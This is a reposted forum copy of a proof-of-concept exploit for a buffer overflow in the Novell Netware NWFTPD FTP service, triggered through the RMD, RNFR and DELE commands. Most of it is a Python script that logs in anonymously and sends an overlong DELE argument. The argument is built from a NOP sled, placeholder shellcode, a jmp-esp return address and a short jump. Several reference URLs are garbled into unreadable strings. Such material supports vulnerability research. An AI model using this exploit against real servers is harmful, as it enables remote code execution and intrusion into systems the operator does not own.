-
-
[推荐][转帖]MOAUB #7 - Novell Netware NWFTPD RMD/RNFR/DELE Argument Parsing Buffer overfl
-
-
[推荐][转帖]MOAUB #7 - Novell Netware NWFTPD RMD/RNFR/DELE Argument Parsing Buffer overfl
'''
__ __ ____ _ _ ____
| \/ |/ __ \ /\ | | | | _ \
| \ / | | | | / \ | | | | |_) |
| |\/| | | | |/ /\ \| | | | _ < Day 7 - (Binary Analysis)
| | | | |__| / ____ \ |__| | |_) |
|_| |_|\____/_/ \_\____/|____/
8b1K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3g2^5M7r3I4G2K9i4c8Q4x3X3c8V1j5W2)9J5k6h3y4G2L8g2)9J5c8X3#2G2j5i4g2T1i4K6u0V1y4#2)9J5k6r3&6G2N6X3g2D9L8q4)9J5k6r3&6W2N6s2N6S2M7X3g2Q4x3X3c8F1N6$3k6@1M7r3c8Q4x3X3c8J5L8h3c8J5L8X3k6J5k6r3g2D9k6g2)9J5k6r3q4J5k6%4g2E0k6h3&6@1i4K6u0V1M7r3q4J5M7$3W2F1k6#2)9J5k6r3u0#2k6X3k6W2M7W2)9J5k6r3!0$3k6i4u0X3L8r3!0%4i4K6u0r3i4K6t1$3L8X3u0K6M7q4)9K6b7W2)9J5y4X3&6T1M7%4m8Q4x3@1t1`.
'''
'''
Title : Novell Netware NWFTPD RMD/RNFR/DELE Argument Parsing Buffer overflow
Version : NWFTPD.NLM 5.09.02 (Netware 6.5 SP8)
Analysis :
1e1K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3q4T1P5i4y4K6M7$3g2U0i4K6u0W2j5$3!0E0i4K6t1$3L8X3u0K6M7q4)9K6b7W2)9J5y4X3&6T1M7%4m8Q4x3@1t1`.
Vendor :
2baK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6f1&6G2N6X3g2D9L8q4)9J5k6h3y4G2L8g2)9J5y4X3&6T1M7%4m8Q4x3@1u0Q4x3U0k6F1j5Y4y4H3i4K6y4n7
Impact : Critical
Contact : shahin [at] abysssec.com , info [at] abysssec.com
Twitter : @abysssec
'''
from ftplib import FTP
import sys
try:
netwareServerIp = '127.0.0.1'
ftp = FTP(netwareServerIp)
ftp.login('anonymous','a@a')
buffer = "/"
buffer += "\x90"*107 #nops
buffer += "\xcc"*413 #shellcode part2 = 413 byte
buffer += "\xb9\xa4\xe0\x91" #EIP - jmp esp from nwftpd.nlm module
buffer += "\xcc"*124 #shellcode part1 = 124 byte
buffer += "\x08\xeb\x90\x90\x90\x90" #short jmp to shellcode part2
ftp.voidcmd('DELE ' + buffer)
except Exception,err:
print err
[培训]科锐逆向工程师培训第53期2025年7月8日开班!
